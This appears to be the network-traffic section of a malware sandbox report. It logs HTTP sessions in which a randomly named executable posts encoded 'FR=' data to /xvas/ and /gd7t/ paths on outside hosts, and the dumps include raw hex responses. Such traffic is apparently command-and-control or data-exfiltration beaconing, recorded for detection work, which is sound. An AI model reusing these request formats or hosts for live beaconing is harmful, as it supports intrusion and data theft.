              Sep 6, 2024 09:05:44.232168913 CEST1236INData Raw: b0 8c 8b f9 e8 17 66 d5 5f 7a 2f 7b ed f6 5f ba af fa e5 f7 71 f9 7d 82 df 27 af 7e 75 ed a0 71 d0 de a2 ee c0 14 21 0a f0 97 de 8f 82 59 2e 31 5c fe 52 dc e9 c5 f3 76 ef f4 fc 49 8e 16 4f af 28 ae cc 99 a0 26 65 9a cb e4 cb 4f 77 17 6b 79 43 77
              Data Ascii: f_z/{_q}'~uq!Y.1\RvIO(&eOwkyCwj:~uM<UTeG-#ZT/o/9Y^y9-#Y9[EN^UT{+X?17`|m?;qv/^Y:u^cQy[DZ4GO/LynY^9#*k
              Sep 6, 2024 09:05:44.232180119 CEST1236INData Raw: ce ea 8b 68 77 4f 34 62 e8 c3 75 a0 77 37 b0 35 83 25 5c 96 27 a6 42 6d 00 ae 13 6e 0f 2a 8b 2c 04 0d 71 99 bc 73 13 b7 cb 52 27 7f c6 e3 04 2c f1 2d 4b 22 a1 8a b2 65 69 a9 2a 67 96 45 5b 6c 76 df ba 4e 76 3b 74 a7 23 52 d2 82 b4 e8 a5 47 d4 f4
              Data Ascii: hwO4buw75%\'Bmn*,qsR',-K"ei*gE[lvNv;t#RGQD&RY!C:n[ex\7s!dzDhEWV+`3.lg(%!*M9.(z->Q*A|LBv*BS:[7k5En9>"7Rr=yawy3nx
              Sep 6, 2024 09:05:44.232192039 CEST1236INData Raw: 28 a5 7f 22 a1 d3 f6 35 7e 2a 42 8e 40 06 96 11 c9 32 18 79 99 71 1c 78 c4 2c c7 e3 be c3 db fd 2d 63 09 78 64 31 e3 a9 b9 74 4f da d7 f8 59 71 f9 06 ff 5d 04 29 b0 78 8c 0f a1 8a e7 24 12 cc a0 64 a0 b5 d2 fd 76 9f 40 3a a1 16 b2 5c 30 0b d4 a8
              Data Ascii: ("5~*B@2yqx,-cxd1tOYq])x$dv@:\0H2Qv#h4T*,iUV/0U|dbt{)McBZ[.b>%<yy%_+8%Kdh>8#XuB+0=+;T)O<+g*cW3(%J
              Sep 6, 2024 09:05:44.232345104 CEST1000INData Raw: b8 05 8a 1c 2c 48 bb b0 4f e5 a1 b5 cd 16 95 cb 49 91 40 36 13 7e bd 34 9b ab 5f 61 2f 91 96 4d 91 12 04 3f f4 cc 55 bb fa 3a 62 ce 12 a0 86 cb 44 c0 32 bd 2f 4f 4b d2 8b 89 17 69 67 a3 c4 72 eb 10 4a 79 c7 6f 95 d6 f3 16 79 97 72 43 de 60 96 fc
              Data Ascii: ,HOI@6~4_a/M?U:bD2/OKigrJyoyrC`Wi'K82WasH"S3"J&6\scQB25'VbLaP362&"|1JuLs]GXN:Rks3TeO"0Jv!v{B#e^Xby!"
              Sep 6, 2024 09:05:44.232357979 CEST1236INData Raw: 47 eb 2f 4b 36 1a e9 c2 50 96 5b 01 de f8 87 c2 a0 23 8c 3b 5e 7f c3 42 0e 85 86 8b ec da 3a 5e 79 61 47 67 a3 c0 ab b7 61 0d de 72 55 53 1d f0 b4 dd db 28 aa 0e bc 2e b0 f3 1c 68 54 18 64 5a 8b aa f0 23 44 f6 6e bc 84 5b 5b e2 b9 37 7e a3 95 2b
              Data Ascii: G/K6P[#;^B:^yaGgarUS(.hTdZ#Dn[[7~+u]\vrorx]hX%qI,e0d,]gb0y]Y{]WbErlp]W/lfy'pgYD27nuAUj-Hs.V4VQdLdg
              Sep 6, 2024 09:05:44.232372999 CEST994INData Raw: bf df e0 5f 05 18 db d8 ed 77 2c f7 55 0e b2 e1 bd 79 fd f6 9d d7 72 f6 6e 11 ab 0b d8 5f 6f c0 2e 40 7f 06 16 83 6e 78 af aa 33 d0 77 f3 1c 10 c3 63 79 2e 78 c4 2c 57 32 f8 68 94 3c 8f 52 a6 b1 6d f4 8f 77 7f a5 a7 de 7d d0 32 6e fc fd ed eb ff
              Data Ascii: _w,Uyrn_o.@nx3wcy.x,W2h<Rmw}2n\&|2o*7nn*rHW*F,YG)GC,9DSi:4Dm4hLnXthQ$="K!}hIfT@7"qrFNeA5CA


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.649738192.185.16.209805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:46.117055893 CEST1849OUTPOST /xvas/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.homebizsuccess.blog
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.homebizsuccess.blog
              Referer: http://www.homebizsuccess.blog/xvas/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 2f 58 73 66 6e 43 63 37 44 66 6d 5a 54 6c 69 2b 4e 35 43 6b 39 2b 48 46 56 59 6a 2b 57 66 48 75 45 4b 76 61 33 31 4f 78 78 43 31 61 56 38 74 43 7a 2f 31 6f 43 54 38 62 4f 79 38 4a 34 4a 4c 61 43 34 35 70 76 33 30 49 65 4e 44 61 38 64 41 54 65 30 4e 66 58 50 69 2b 42 34 51 65 4b 70 35 74 72 78 36 30 5a 69 6b 67 31 4e 38 39 49 49 31 71 43 76 50 75 64 35 68 79 64 7a 4e 64 55 78 66 4c 4a 36 68 2f 71 41 62 4b 39 34 48 69 72 73 75 4a 31 35 33 6a 2f 32 45 47 42 76 78 75 4f 74 36 7a 66 52 73 68 6d 37 76 4e 6e 55 30 70 2b 39 58 2b 4f 6d 41 41 7a 73 6b 5a 37 63 31 39 4a 37 30 33 2b 53 33 4d 4b 4c 5a 39 4a 55 77 45 50 74 70 76 75 4a 63 59 38 33 74 6f 37 55 54 4e 53 69 6e 76 4b 62 37 43 6e 39 42 71 38 65 72 7a 4b 61 66 36 7a 37 55 30 57 52 67 33 6c 6c 42 4b 44 50 49 65 46 6d 39 32 48 46 55 53 66 33 54 78 7a 53 36 35 55 52 4e 52 75 49 50 73 6b 42 2b 77 2f 69 65 47 6c 30 34 38 6b 71 37 59 69 6e 32 36 2b 77 72 61 78 64 30 54 46 48 71 6c 31 4c 31 6b 63 43 37 69 39 38 35 63 6b 57 5a 37 62 44 31 32 70 38 [TRUNCATED]
              Data Ascii: FR=E/XsfnCc7DfmZTli+N5Ck9+HFVYj+WfHuEKva31OxxC1aV8tCz/1oCT8bOy8J4JLaC45pv30IeNDa8dATe0NfXPi+B4QeKp5trx60Zikg1N89II1qCvPud5hydzNdUxfLJ6h/qAbK94HirsuJ153j/2EGBvxuOt6zfRshm7vNnU0p+9X+OmAAzskZ7c19J703+S3MKLZ9JUwEPtpvuJcY83to7UTNSinvKb7Cn9Bq8erzKaf6z7U0WRg3llBKDPIeFm92HFUSf3TxzS65URNRuIPskB+w/ieGl048kq7Yin26+wraxd0TFHql1L1kcC7i985ckWZ7bD12p8q3qGkyUUO7afnbV6/4xs+2fp7p36k3E//DCE8EWKRm6+lpXhffvb1/aIBiPNA7CCzwF3KQKR+amatmCHBlvq1CFDhGVQWuZa2e95idkjGnoFjpeAbBNSL4rORAPTKB4TcsXuXnamHQJ5qf9yjo7lWHusfAZCuR1BFMgGXkk83md4n3HDvESmYjeeljjB7GVoJziiAFZySFF4Cs+aAKflceGDTVHxQgfX6y//EyA/q0kbmoNDl9ViMyd4oz2Ez2MEylndnIGh8HJ0EQ+1COJPp8jGFDIN0l+l+kn3yZOZhwILQ55RHCSXU7v/wSaWpB735iUO0jdLn4EqSYCTUfIdjl3+8rE3VRgzzSUvNIqix8QicA4Ic66CIQwPLrZeo/V3GHXgcaNGwhN/WX6xZaO+IEEe7PYcfz8Dn0hK1t3y7QYfP9CPBSn/ZlOB02+CI1LuO0hurmBF/2XNWC5W2xh5+mUkhY69d4r4hlbC713ZxJG5gWRtJFzONcuRlFfjCitAQ8kXFkqE7a89bTwL0QVg576hlv0djBTQOLJvUK1bK5wegEq9i1WtZ4/gWVnojBgjP6H/c6KcaceOZRcUy9vz1uHNLvWOZPccx76pcLFl2EOhXg7H8Pcpmmiwnw+OkG9V+trN3mhfMZasex5Ymjqm020L+ptX2Ycyqk [TRUNCATED]
              Sep 6, 2024 09:05:46.700680971 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:05:46 GMT
              Server: Apache
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              Content-Length: 11436
              Content-Type: text/html; charset=UTF-8
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 01 2d 5f 5a 84 4b 6e 39 13 d4 44 4c c0 a8 e3 ad e6 fd c2 e5 d5 72 9e 70 cf 1a c4 c8 cb b5 9a 70 01 1e 49 35 4c 46 5e 6a 6d 3e 0c 82 24 cb 13 5f e9 24 b8 9e c8 a0 b3 00 a9 35 71 99 84 2c ba da ea 4a 55 06 21 ff 64 8a 28 02 63 fc 50 28 04 c8 84 ce 23 3f 4f f3 35 93 7f be 21 3f a3 12 4b 32 96 5b 01 e3 37 2c 01 22 95 25 13 55 c8 98 bc 78 7e da ed 74 ce c9 cf 88 49 7e e0 9f c8 db 0a f5 22 a8 ca 0f 6b d2 1c 69 15 2a 6b 8e 56 c2 1c 65 ec 9a f2 0c 11 69 ae c1 09 37 14 4c 27 70 44 02 6c 5c ed 71 14 4b e3 [TRUNCATED]
              Data Ascii: rsFRU6\c(uf+m@[nLw~)&s=\<w'L9pD0<o2,g_2Bi(eyxWze0f#$xlQS-_ZKn9DLrppI5LF^jm>$_$5q,JU!d(cP(#?O5!?K2[7,"%Ux~tI~"ki*kVei7L'pDl\qK&`hkx'J%XlcvYY11`r;UsW.OJejm%Z4IH.hXG6eUgo2k2.H9J/Al~t{tO!s&_%T{WxSl[;T{re$h@IKGhw{{=#Rn h4N&%7Sj/$j@ySk<'^Os[ [47Vd-nj|6vD3tORn-9j
              Sep 6, 2024 09:05:46.700699091 CEST1236INData Raw: f2 1f 5c da 5e f7 a5 d6 6c de 00 3f 41 4e ee 96 c8 9d 3d 06 da 8f b1 b0 d9 d2 a3 c6 57 70 92 25 a7 d6 53 b1 69 9e 6b b0 85 96 c4 fa 80 26 98 37 56 77 45 f9 9a 37 8b 24 8c 46 23 fd bb fd 70 db 5c 0b 5c 2c 05 36 33 ee e4 c7 ea 08 1d e5 4d 04 4b bc
              Data Ascii: \^l?AN=Wp%Sik&7VwE7$F#p\\,63MKxd{_L=y_tx{:g{v4_xa=aw&ZV{'r|'yyGAmu+NHTvY_}iG^!cpld9W
              Sep 6, 2024 09:05:46.700717926 CEST1236INData Raw: 72 ef 8a b2 a1 5c e2 86 0b ea 5b 28 e3 c3 c3 03 9e 25 28 29 35 19 17 30 6f 11 f7 5a b6 93 9b c3 83 83 98 9b 5c b0 f9 90 54 20 e4 19 cf dc e5 99 b4 e7 98 0d 95 c6 a5 86 44 aa 1d a9 6b 6a 52 86 77 d8 99 4e 81 27 a9 1d 92 0e 64 5b 19 14 c3 a6 bb 12
              Data Ascii: r\[(%()50oZ\T DkjRwN'd[IoIVGLP&xepL*dUfl$n]EGWTP3=Y(6~tEsLfMyrF3.L0V$hf!&jVKM|-8]D{I/:C5
              Sep 6, 2024 09:05:46.700778961 CEST672INData Raw: 39 13 3c 91 94 5b c8 cc 90 44 20 2d e8 3b 4d 64 4c 86 dc 34 be 6d 91 98 4f 9b 37 19 d3 09 97 c8 e2 2e 03 c7 71 cd c0 bd 6d 80 b9 c0 7e b0 e5 ca a8 6b 28 54 74 45 23 25 8a 4c 9a dd 3a 75 eb 2a dd d3 52 93 6d 77 4b ae 8c a5 b8 3f 72 b6 b0 7b 56 c7
              Data Ascii: 9<[D -;MdL4mO7.qm~k(TtE#%L:u*RmwK?r{VVomO.VT)M/Z63J[&#3#v R#9@s.~OyL5ZB[p%L&ug3Xe<IduGo9bJnu
              Sep 6, 2024 09:05:46.700790882 CEST1236INData Raw: 98 ab a7 b1 9b 43 da 31 29 67 a8 9d 8a 00 8f fd 35 63 d6 30 3b 66 80 70 87 e4 91 ab 37 e6 ab e6 6c 42 ed 98 95 f1 58 2e 7d fc c5 53 96 20 3b f0 4d c6 84 a0 13 85 65 86 7f 82 9b d5 d3 2e c4 55 92 56 7d bb f8 42 cc 8b ec 0b 00 ab c6 5d de 61 3a 81
              Data Ascii: C1)g5c0;fp7lBX.}S ;Me.UV}B]a:/,v]1.,B++c,sUX:pIX>${{#%L#;mMVcReZBYhhr.4@&1:*#&GinD#FTdtZ U
              Sep 6, 2024 09:05:46.700803995 CEST1236INData Raw: f1 cb 6d 3f 83 52 ff b4 bd 9b d2 c9 e0 e4 73 19 f5 4f fc 93 ee ea 5f 6f 83 5a b7 bb 95 fb 1c 92 bd ee 1e 92 fd cf 3f 61 f7 c4 1f f4 3a c7 27 a7 67 fd 93 9e bb 47 8d 64 a7 e7 af 33 fd ee 9a a4 9f b3 04 a8 85 2c 17 cc 02 8d 61 c2 0a 61 c9 f3 48 49
              Data Ascii: m?RsO_oZ?a:'gGd3,aaHIV!,DBFuEqYthUFJ(=$njeT)OJ?Y1Xa0~w'Y-L&:]!Ax-!/,E!"HS|P>}E?p#X!vsa[WtQJ
              Sep 6, 2024 09:05:46.700817108 CEST1236INData Raw: 5d 12 2e 30 22 95 cf b5 4b ac 61 43 85 46 ca ca 3d 17 91 fb e4 7e a8 64 98 aa 29 e8 2d 56 dd bd ee 2b dd d0 dd b9 ca 89 6b 8a 94 50 7a 48 9e b7 cb 3f 6c b9 08 8c 9d 0b 18 5f 64 60 19 91 2c 83 91 97 80 04 cd ac d2 1e d6 4b 0b d2 8e bc 9f 04 20 2f
              Data Ascii: ].0"KaCF=~d)-V+kPzH?l_d`,K /=-pL|s)-L8Q.,[0(e]KkZ@i^3T|.#pNXUH5]F)\8EQq Y(J17`sjf,,i96jB<J
              Sep 6, 2024 09:05:46.700944901 CEST1236INData Raw: 35 9e 41 21 f0 31 e6 d3 f1 c1 41 f5 7b f1 8c 52 f2 5c b2 29 4f 4a c3 50 2e 25 68 42 e9 f8 9b 43 ac c1 92 6a 33 15 72 01 74 5d e7 b9 bc 6b be 30 39 93 cb 4d 53 60 31 68 ba ae a6 a9 52 57 48 fc e1 22 ca 23 87 7a 11 b8 d2 e5 4f 45 e3 c2 4c 13 32 05
              Data Ascii: 5A!1A{R\)OJP.%hBCj3rt]k09MS`1hRWH"#zOEL2mpLHSf3NnyQ2\^*eKG^;dar&>1v.`,J*d<|>Lg<C$\=!9"g6]p_G)~g'kgpw[
              Sep 6, 2024 09:05:46.700956106 CEST1236INData Raw: 31 3e 36 27 41 0a 42 28 3a 53 5a c4 81 37 fe d9 bd 91 f2 ed d9 45 c0 f0 3e 38 f1 f0 22 28 c4 e6 c1 f6 1f ef ec 7f dd f1 5e a9 cc 99 7c 71 3f b5 f7 7e d1 a2 ae 3c d3 43 45 97 97 8b 27 ac 66 da f2 48 c0 f8 62 a2 94 c5 15 1e db 4a 33 b0 cc bb c7 10
              Data Ascii: 1>6'AB(:SZ7E>8"(^|q?~<CE'fHbJ3w;XaS}s,t.xI7.Q|8D9"P6h/u),Y&[%%wwn'Z/9+t~4dDue')xyh
              Sep 6, 2024 09:05:46.700968027 CEST1236INData Raw: f7 1f 73 83 ce 1d 98 cf 3a 73 a4 a4 b1 24 67 9a 65 06 c1 84 8a 98 73 b0 6f 80 e9 28 f5 8d e0 11 34 3a 4d df e4 68 bc c6 d1 8b a3 26 ce 89 0b 0c 36 58 14 b5 88 69 92 d1 f8 1e b2 15 fe ef 57 2d 32 fd 80 f8 66 09 34 3a 6a 3e e0 56 f2 3a fc 08 91 f5
              Data Ascii: s:s$geso(4:Mh&6XiW-2f4:j>V:1<>vw-`=+ E)C`FYT*x *#[UBG0\_o EVoX3vqLSG7UI$xj)l.zvkyR*d
              Sep 6, 2024 09:05:46.705580950 CEST86INData Raw: c6 d6 e7 6b 0f 4e 8e 4f e3 7e 7c da 3e 89 cf e2 6e 37 1a 00 7b dc 01 9e d6 6c cb fd 6c 0a 19 ae 64 54 a4 cb 99 d3 63 67 bf 04 24 68 d4 b7 e6 bb 63 bf dd 1f 2c 98 ae 8b a9 db cd b9 63 93 df 37 78 8b 50 c5 f3 b1 7b 48 6d 26 f0 e1 ff 02 4b e0 76 79
              Data Ascii: kNO~|>n7{lldTcg$hc,c7xP{Hm&Kvyn


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.649739192.185.16.209805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:48.671171904 CEST537OUTGET /xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.homebizsuccess.blog
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:49.277040005 CEST563INHTTP/1.1 301 Moved Permanently
              Date: Fri, 06 Sep 2024 07:05:49 GMT
              Server: nginx/1.23.4
              Content-Type: text/html; charset=UTF-8
              Content-Length: 0
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              X-Redirect-By: WordPress
              Location: http://homebizsuccess.blog/xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox
              X-Endurance-Cache-Level: 2
              X-nginx-cache: WordPress
              X-Server-Cache: true
              X-Proxy-Cache: MISS


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.649741154.23.184.240805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:59.752734900 CEST782OUTPOST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 6e 6f 38 67 51 4e 6f 42 39 59 72 65 68 41 79 71 63 4e 5a 76 42 55 2f 63 31 64 65 51 70 75 51 74 69 61 78 77 75 4b 4c 56 6c 69 7a 39 5a 57 5a 77 44 4d 76 47 53 65 55 45 47 52 34 33 70 58 5a 7a 56 6d 36 76 61 42 72 55 79 61 2b 66 64 75 4c 4d 55 41 76 59 35 54 59 67 76 64 35 6d 74 52 34 31 31 45 31 4f 71 46 49 2b 69 5a 4a 79 49 72 37 6e 4a 69 6f 6c 6f 49 44 45 39 51 4f 5a 50 4a 52 6e 32 48 67 45 65 6e 4c 35 72 49 36 6c 64 7a 35 55 49 43 6f 4c 59 35 67 79 35 55 4a 42 37 69 64 44 36 55 62 51 6a 42 4f 66 6b 55 4b 36 35 6a 30 5a 4a 35 64 41 4d 6e 58 62 5a 4a 6f 34 2b 53 2f 59 68 5a 58 37 4f 46 6c 65 5a 6a 59
              Data Ascii: FR=Eno8gQNoB9YrehAyqcNZvBU/c1deQpuQtiaxwuKLVliz9ZWZwDMvGSeUEGR43pXZzVm6vaBrUya+fduLMUAvY5TYgvd5mtR411E1OqFI+iZJyIr7nJioloIDE9QOZPJRn2HgEenL5rI6ldz5UICoLY5gy5UJB7idD6UbQjBOfkUK65j0ZJ5dAMnXbZJo4+S/YhZX7OFleZjY
              Sep 6, 2024 09:06:00.669884920 CEST312INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:00 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.649742154.23.184.240805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:02.289906979 CEST806OUTPOST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 6e 6f 38 67 51 4e 6f 42 39 59 72 66 42 77 79 6f 37 78 5a 2b 78 55 34 5a 31 64 65 65 35 75 55 74 69 57 78 77 73 6d 62 56 7a 61 7a 7a 5a 47 5a 78 47 67 76 42 53 65 55 57 6d 52 35 36 4a 58 6b 7a 56 69 79 76 61 39 72 55 79 4f 2b 66 59 4b 4c 4d 6e 59 67 4a 35 54 61 31 66 64 37 37 39 52 34 31 31 45 31 4f 71 51 74 2b 6d 4e 4a 79 35 62 37 6d 6f 69 72 35 34 49 45 55 64 51 4f 53 76 4a 56 6e 32 47 7a 45 66 72 6c 35 6f 77 36 6c 63 44 35 56 5a 43 72 42 59 35 36 74 70 56 63 49 70 58 6a 4d 6f 4a 61 51 77 64 51 43 6a 49 61 79 76 69 75 46 36 35 2b 53 63 48 56 62 62 52 61 34 65 53 56 61 68 68 58 70 5a 4a 43 52 74 47 37 6a 32 54 4a 75 77 56 51 33 4f 6f 50 62 53 67 78 56 67 52 32 46 51 3d 3d
              Data Ascii: FR=Eno8gQNoB9YrfBwyo7xZ+xU4Z1dee5uUtiWxwsmbVzazzZGZxGgvBSeUWmR56JXkzViyva9rUyO+fYKLMnYgJ5Ta1fd779R411E1OqQt+mNJy5b7moir54IEUdQOSvJVn2GzEfrl5ow6lcD5VZCrBY56tpVcIpXjMoJaQwdQCjIayviuF65+ScHVbbRa4eSVahhXpZJCRtG7j2TJuwVQ3OoPbSgxVgR2FQ==
              Sep 6, 2024 09:06:03.167438984 CEST312INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Fri, 06 Sep 2024 07:06:03 GMT
              Content-Type: text/html
              Content-Length: 148
              Connection: close
              ETag: "66a8e223-94"
              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.649743154.23.184.240805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:04.839206934 CEST1819OUTPOST /gd7t/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.hm62t.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.hm62t.top
              Referer: http://www.hm62t.top/gd7t/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 45 6e 6f 38 67 51 4e 6f 42 39 59 72 66 42 77 79 6f 37 78 5a 2b 78 55 34 5a 31 64 65 65 35 75 55 74 69 57 78 77 73 6d 62 56 7a 53 7a 7a 76 4b 5a 33 68 30 76 41 53 65 55 56 6d 52 38 36 4a 58 31 7a 56 61 32 76 61 77 63 55 78 32 2b 4e 72 79 4c 4b 57 59 67 41 35 54 61 33 66 64 34 6d 74 51 36 31 31 55 50 4f 71 41 74 2b 6d 4e 4a 79 36 7a 37 76 5a 69 72 37 34 49 44 45 39 51 4b 5a 50 4a 74 6e 32 65 6a 45 66 76 62 35 5a 51 36 69 38 54 35 54 72 71 72 4e 59 35 6b 75 70 55 66 49 70 4c 47 4d 6f 56 38 51 7a 42 71 43 6b 67 61 34 71 62 71 41 34 68 36 47 73 76 4d 46 36 78 6e 30 72 6d 32 52 6a 78 67 74 34 4a 4a 52 2b 53 48 6c 69 4c 78 6f 32 73 47 30 74 4d 69 45 6e 4a 42 5a 44 51 73 62 77 77 52 69 6f 65 4c 36 6e 37 33 6f 52 56 4b 4c 74 53 79 77 63 58 50 39 6e 70 6d 37 6a 4f 2b 42 55 52 55 42 32 76 4d 42 55 42 76 54 67 33 6b 72 50 62 64 4c 53 74 68 64 72 6e 74 64 75 78 78 59 6e 68 47 32 52 59 74 79 4f 4b 63 48 72 50 66 5a 4c 57 66 61 67 52 4d 45 4d 34 62 45 32 43 72 41 69 48 2f 45 7a 4e 6d 47 65 74 4a 4c 61 66 [TRUNCATED]
